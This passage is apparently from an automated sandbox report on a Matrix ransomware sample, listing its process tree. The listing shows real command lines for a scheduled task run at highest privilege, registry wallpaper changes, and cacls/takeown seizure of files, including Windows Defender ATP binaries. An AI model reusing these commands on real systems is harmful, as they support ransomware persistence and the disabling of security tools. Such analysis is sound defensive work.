710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 543 PID 3832 wrote to memory of 5552 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 543 PID 5552 wrote to memory of 5476 5552 cmd.exe 545 PID 5552 wrote to memory of 5476 5552 cmd.exe 545 PID 5552 wrote to memory of 5476 5552 cmd.exe 545 PID 5552 wrote to memory of 6084 5552 cmd.exe 546 PID 5552 wrote to memory of 6084 5552 cmd.exe 546 PID 5552 wrote to memory of 6084 5552 cmd.exe 546 PID 5552 wrote to memory of 5620 5552 cmd.exe 547 PID 5552 wrote to memory of 5620 5552 cmd.exe 547 PID 5552 wrote to memory of 5620 5552 cmd.exe 547 PID 5620 wrote to memory of 5204 5620 cmd.exe 548 PID 5620 wrote to memory of 5204 5620 cmd.exe 548 PID 5620 wrote to memory of 5204 5620 cmd.exe 548 PID 5552 wrote to memory of 5636 5552 cmd.exe 549 PID 5552 wrote to memory of 5636 5552 cmd.exe 549 PID 5552 wrote to memory of 5636 5552 cmd.exe 549 PID 3832 wrote to memory of 5772 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 550 PID 3832 wrote to memory of 5772 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 550 PID 3832 wrote to memory of 5772 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 550 PID 5772 wrote to memory of 5672 5772 cmd.exe 552 PID 5772 wrote to memory of 5672 5772 cmd.exe 552 PID 5772 wrote to memory of 5672 5772 cmd.exe 552 PID 5772 wrote to memory of 5528 5772 cmd.exe 553 PID 5772 wrote to memory of 5528 5772 cmd.exe 553 PID 5772 wrote to memory of 5528 5772 cmd.exe 553 PID 5772 wrote to memory of 5372 5772 cmd.exe 554 PID 5772 wrote to memory of 5372 5772 cmd.exe 554 PID 5772 wrote to memory of 5372 5772 cmd.exe 554 PID 5372 wrote to memory of 5768 5372 cmd.exe 555 PID 5372 wrote to memory of 5768 5372 cmd.exe 555 PID 5372 wrote to memory of 5768 5372 cmd.exe 555 PID 5772 wrote to memory of 6108 5772 cmd.exe 556 PID 5772 wrote to memory of 6108 5772 cmd.exe 556 PID 5772 wrote to memory of 6108 5772 cmd.exe 556 PID 3832 wrote to memory of 6028 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 557 PID 3832 wrote to memory of 6028 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 557 PID 3832 wrote to memory of 6028 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 557 PID 6028 wrote to memory of 6000 6028 cmd.exe 559 PID 6028 wrote to memory of 6000 6028 cmd.exe 559 PID 6028 wrote to memory of 6000 6028 cmd.exe 559 PID 6028 wrote to memory of 5400 6028 cmd.exe 560 PID 6028 wrote to memory of 5400 6028 cmd.exe 560 PID 6028 wrote to memory of 5400 6028 cmd.exe 560 PID 6028 wrote to memory of 4528 6028 cmd.exe 561 PID 6028 wrote to memory of 4528 6028 cmd.exe 561 PID 6028 wrote to memory of 4528 6028 cmd.exe 561 PID 4528 wrote to memory of 5904 4528 cmd.exe 562 PID 4528 wrote to memory of 5904 4528 cmd.exe 562 PID 4528 wrote to memory of 5904 4528 cmd.exe 562 PID 6028 wrote to memory of 1244 6028 cmd.exe 563 PID 6028 wrote to memory of 1244 6028 cmd.exe 563 PID 6028 wrote to memory of 1244 6028 cmd.exe 563 PID 3832 wrote to memory of 1764 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 564 PID 3832 wrote to memory of 1764 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 564 PID 3832 wrote to memory of 1764 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 564 PID 1764 wrote to memory of 644 1764 cmd.exe 566 PID 1764 wrote to memory of 644 1764 cmd.exe 566 PID 1764 wrote to memory of 644 1764 cmd.exe 566 PID 1764 wrote to memory of 5520 1764 cmd.exe 567 PID 1764 wrote to memory of 5520 1764 cmd.exe 567 PID 1764 wrote to memory of 5520 1764 cmd.exe 567 PID 1764 wrote to memory of 5448 1764 cmd.exe 568 PID 1764 wrote to memory of 5448 1764 cmd.exe 568 PID 1764 wrote to memory of 5448 1764 cmd.exe 568 PID 5448 wrote to memory of 5544 5448 cmd.exe 569 PID 5448 wrote to memory of 5544 5448 cmd.exe 569 PID 5448 wrote to memory of 5544 5448 cmd.exe 569 PID 1764 wrote to memory of 356 1764 cmd.exe 570 PID 1764 wrote to memory of 356 1764 cmd.exe 570 PID 1764 wrote to memory of 356 1764 cmd.exe 570 PID 3800 wrote to memory of 5440 3800 cmd.exe 571 PID 3800 wrote to memory of 5440 3800 cmd.exe 571 PID 3800 wrote to memory of 1728 3800 cmd.exe 573 PID 3800 wrote to memory of 1728 3800 cmd.exe 573 PID 3800 wrote to memory of 5972 3800 cmd.exe 574 PID 3800 wrote to memory of 5972 3800 cmd.exe 574 PID 3800 wrote to memory of 5760 3800 cmd.exe 575 PID 3800 wrote to memory of 5760 3800 cmd.exe 575 PID 2860 wrote to memory of 5244 2860 NWlShxDx.exe 576 PID 2860 wrote to memory of 5244 2860 NWlShxDx.exe 576 PID 2860 wrote to memory of 5244 2860 NWlShxDx.exe 576
Processes
-
C:\Users\Admin\AppData\Local\Temp\710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe"C:\Users\Admin\AppData\Local\Temp\710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe" "C:\Users\Admin\AppData\Local\Temp\NWlShxDx.exe"2⤵PID:2356
-
-
C:\Users\Admin\AppData\Local\Temp\NWlShxDx.exe"C:\Users\Admin\AppData\Local\Temp\NWlShxDx.exe" -n2⤵
- Executes dropped EXE
PID:2860 -
C:\Users\Admin\AppData\Local\Temp\NWlShxDx.exe"C:\Users\Admin\AppData\Local\Temp\NWlShxDx.exe" "\\10.10.0.52\C$"3⤵PID:5244
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\N16oROhJ.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\N16oROhJ.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:2776
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:4000
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:3840
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\cCBySGFb.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\cCBySGFb.vbs"3⤵PID:3368
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\AXFIGuvD.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:4904
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\AXFIGuvD.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1100
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:2304
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:4764
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""2⤵
- Suspicious use of WriteProcessMemory
PID:416 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C3⤵PID:1348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "SmsInterceptStore.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "SmsInterceptStore.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ64.exeL5BjIoLQ.exe -accepteula "SmsInterceptStore.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4184
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""2⤵
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C3⤵PID:4272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"3⤵
- Modifies file permissions
PID:4292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "qmgr.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "qmgr.db" -nobanner4⤵
- Executes dropped EXE
PID:4328
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "classes.jsa" -nobanner3⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4512
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""2⤵PID:4596
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "classes.jsa" -nobanner3⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4700
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:4804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:4848
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4864
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:4916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:5048
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:5096
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:5112
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe""2⤵PID:4160
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe" /E /G Admin:F /C3⤵PID:4300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "SenseSampleUploader.exe" -nobanner3⤵PID:2756
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "SenseSampleUploader.exe" -nobanner4⤵
- Executes dropped EXE
PID:2064
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe""2⤵PID:4396
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G Admin:F /C3⤵PID:4424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "MsSense.exe" -nobanner3⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "MsSense.exe" -nobanner4⤵
- Executes dropped EXE
PID:4500
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:4412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:4672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "WinMail.exe" -nobanner3⤵PID:4688
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "WinMail.exe" -nobanner4⤵
- Executes dropped EXE
PID:4744
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""2⤵PID:4608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C3⤵PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "manifest.json" -nobanner3⤵PID:4772
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "manifest.json" -nobanner4⤵
- Executes dropped EXE
PID:2156
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:4576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4108
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe""2⤵PID:4304
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" /E /G Admin:F /C3⤵PID:2956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "SenseCncProxy.exe" -nobanner3⤵PID:4280
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "SenseCncProxy.exe" -nobanner4⤵
- Executes dropped EXE
PID:4192
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:4532
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4444
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4680
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:4640
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:4648
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "WinMail.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4892
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:5080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:4808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
PID:3704
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:4216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:4200
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4504
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:4712
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:4440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4932
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1044
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui""2⤵PID:4616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G Admin:F /C3⤵PID:4296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "MsSense.exe.mui" -nobanner3⤵PID:4276
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "MsSense.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4492
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
